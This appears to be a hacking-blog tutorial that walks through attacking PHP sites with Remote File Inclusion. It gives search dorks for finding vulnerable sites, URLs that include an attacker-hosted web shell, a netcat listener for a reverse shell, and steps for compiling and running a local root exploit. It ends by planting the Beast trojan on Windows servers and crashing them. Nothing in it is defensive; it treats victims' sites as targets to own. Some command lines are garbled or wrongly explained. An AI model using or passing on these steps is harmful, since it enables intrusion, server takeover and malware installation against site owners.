![=-=>>W3LC[]M3<<=-=](http://3.bp.blogspot.com/-HQcdYiso0K4/UDjeSQBP6mI/AAAAAAAAAEE/1JtAW52i4iU/s1600/2.jpg)
What is RFI?
Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:
Code execution on the web server
Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS).
Denial of Service (DoS)
Data Theft/Manipulation
RFI is a very uncommon vulnerability due to excessive patches and updates on websites.
What makes a page vulnerable?
A PHP include script looks like this.
Code:
include($_GET['p']
?>
Since the code uses 'p' the syntax would be:
Code:
http://victimsite.com/index.php?[b]p[/b]=URL_TO_SHELL.txt?
If the script looks like this:
Code:
include($_GET['lulz']);
?>
The syntax would then be:
Code:
http://victimsite.com/index.php?lulz=URL_TO_SHELL.txt?
What can I accomplish with RFI?
You can include your PHP shells onto the website (GNYShell, C99, etc).
You can include just about any file onto the website.
How can I search for RFI vulnerable sites?
Well, first, we need to obtain a website with a vulnerability. If you are to lazy to look around here is a google dork you can use to find a vulnerable site:
Also you can use exploit scanners for find RFI Vulnerable site.
Here is a list of some RFI dorks:
inurl:"index.php?page=contact.php"
inurl:"template.php?goto="
inurl:"video.php?content="
inurl:"pages.php?page="
inurl:"index1.php?choix="
For More Dorks Click Here To Download RFI Dork List File
We've got our target, how do we exploit this vulnerability?
Testing the vulnerability is basically exploiting the vulnerability. So we will be testing as well as finishing up.
What you have to do is go to your vulnerable website. In this case I will be making a website up for demonstration.
Code:
http://victimsite.com/index.php?p=interview.php
As you can see above there is a file attached to the index.php file. In this case it is "interview.php". Most of the time there will have to be a file at the end of the URL, just like this one. Since we're including a file there has to be something to replace it with.
Tweaking and exploiting :
What you will need.
You will need to upload your shell in .txt format (shell.txt) instead of .php format (shell.php). I recommend you use c99, r57, Locus, etc.
You will need to upload it to any website hosting.
So once you have uploaded your shell to your website, it should look like this.
Code:
http://yoursite.com/shell.txt
Including our shell to our slave's website.
Okay, once we are at the vulnerable page (http://victimsite.com/index.php?p=include.php) we want to replace "include.php" and include our own file.
Our new link should look like this.
Code:
http://victimsite.com/index.php?p=http://yoursite.com/shell.txt?
Note : The question mark (?) is important. If the site was vulnerable you should now see your shell embedded to the webpage. You can then do as you wish with it. Sometimes "shell.txt?" may not be enough, we may need to use null bytes for it to execute successfully. If you receive an error from "shell.txt?" try "shell.txt?".
What this will do is go under the site as a php format. Because if you look closly at index.PHP, you can see that php is the format, so when we tell the website we want to go to: http://yoursite.com/shell.txt it will mistake it as a php file and retrieve us the data.
Once you got your shell on, you can do many things. You can find config.php to get access to mysql, you can get root, etc.
But, we will be focusing on gaining root.
We will need to back connect, to be able to do this, you need to meet two requirements:
Port forward the port you want to connect to.
You will need netcat
Since most shells are sort of screwed on the back connecting part, you can use bc.pl to do a nice back connect.
Back Connect:
Code:
http://pastie.org/396949
Some shells however don't, such as: Locus7Shell, Storm7Shell, GnY shell and some more...
Save as bc.pl then you will need to execute the perl script (bc.pl) to the server itself.
If you want to do this via back connection on shell, then open netcat, type in:
Code:
nc -l -n v- p PORT
You need to insert the port you forwarded, for example:
Code:
nc -l -n -v -p 1337
Press enter, and then it will start listening to the port then go back to the shell and submit the back connection
then once you go back to netcat your ready.
Type:
Code:
whoami
As you can see you do not have root.
Now we need to type uname -a to find out what type of linux box they are running.
It may look something like this:
Code:
Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 08:14:05 EDT 2008 i686
Now look, 2.6.17 is vuln to vmsplice :)
We can add our local root exploit two ways, we can do it via netcat, or we can do it via shell.
now we need to compile it, we can use gcc (compiling command) to do this. Here is how it will look like:
Code:
gcc 5092 -o exploit
What that does is compile 5092 (our Local Root Exploit) and uses -o (which means to open it via exploit)
Or we can do this via shell:
Find your Local Root Exploit for this box, save it as .c go to your shell and upload it.
After uploaded go back to netcat and type in:
Code:
gcc localrootexploit.c -o getr00t
change localrootexploit.c to your exploits name and leave getr00t as what it is named.
Now press enter.
Method #1 (execute Local Root Exploit)
./exploit
Method #2 (execute Local Root Exploit)
./getr00t
Now type in:
Code:
whoami
And if root appears you have successfully rooted this box.
Part 2
If this box you owned is running a Windows NT box or something familiar, we can "Install a Trojan" on them.
To do this you should see a tab somewhere in the shell where it say says "Backdoor host" or something familiar. If not, try a better shell.
Choose a Trojan you like, from my experience I use:
beast v2.07
Install it then it says its ready. Install beast v2.07 client then insert the IP and port it gave you. Then connect.
You need to remember that some Windows Boxes have firewall protection, but since this is winblows there is usually a backup of the desktop and C:\ meaning you can find the firewall and delete a needed file and then it won't execute correctly then, you got yourself some win.
This is exactly why you never run a Windows box on your server.
If you like you can crash this box using a winpopup message. This is easy to do from unix using smbclient -U Lotsofshit -M host.
No comments:
Post a Comment